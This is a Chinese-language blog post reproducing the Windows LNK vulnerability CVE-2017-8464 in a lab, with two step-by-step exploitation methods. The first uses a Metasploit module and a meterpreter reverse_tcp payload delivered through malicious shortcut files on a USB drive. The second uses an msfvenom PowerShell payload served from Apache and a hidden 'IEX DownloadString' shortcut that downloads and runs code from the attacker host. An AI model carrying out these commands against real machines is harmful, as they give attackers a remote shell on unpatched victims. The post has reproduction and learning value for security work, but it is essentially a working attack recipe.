1. 程式人生 > >【漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)

【漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)

art cal mage http test ip地址 get for oot

早在6月13日,微軟發布補丁修復編號為CVE-2017-8464的漏洞,本地用戶或遠程攻擊者可以利用該漏洞生成特制的快捷方式,並通過可移動設備或者遠程共享的方式導致遠程代碼執行,追溯到以前,NSA就承認利用過相似漏洞且以“Olympic Game”為代號研發震網病毒,來阻止伊朗發展核武。

受影響版本

Windows 7

Windows 8.1

Windows RT 8.1

Windows 10

Windows Server 2008

Windows Server 2008 R2

Windows Server 2012

Windows Server 
2012 R2 Windows Server 2016

實戰Metasploit成功利用

環境:

kali Linux:192.168.149.129

win7 SP1 一臺

下載利用工具:https://github.com/rapid7/metasploit-framework/archive/master.zip

下載完成後將壓縮包內modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb復制到目錄/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。

2.僅復制rb文件會出錯,須再將壓縮包內data/exploits中的cve-2017-8464文件夾復制到/usr/share/metasploit-framework/data/exploits中。

安裝完後打開終端

msfconsole

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [你的IP地址]

exploit

技術分享

之後會在/root/.msf4/local目錄下生成我們的利用文件

註意:kali2.0下無法直接訪問該文件夾,可通過命令行將/root/.msf4/local/下的所有文件復制到/root/1下

cp -r /root/.msf4/local/ /root/1

技術分享

全部復制到移動磁盤中去

然後在msf監聽

use multi/handler

set paylaod windows/meterpreter/reverse_tcp

set LHOST [你的IP地址]

run

然後在目標機上打開移動磁盤

成功接受到返回的shell

技術分享

利用Powershell提權

首先還是利用msf生成一個ps1文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.149.129 -f  psh-reflection>/opt/search.ps1

技術分享

然後將/opt/目錄下的search.ps1文件移動到/var/www/html/下

隨後打開Apache服務

service apache2 start

訪問web下的sp1文件

技術分享

然後在目標機上建立一個快捷方式

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.149.129/search.ps1‘);test.ps1"

技術分享

這裏寫我們構造好的代碼

然後選中powershell.exe

再到本機上配置監聽

技術分享

運行ps1快捷文件

技術分享

作者:神風

參考文章:

“震網三代”(CVE-2017-8464)的幾種利用方法與防範:http://www.freebuf.com/news/143356.html

【漏洞預警】CVE-2017-8464 震網三代漏洞復現(兩種利用方法)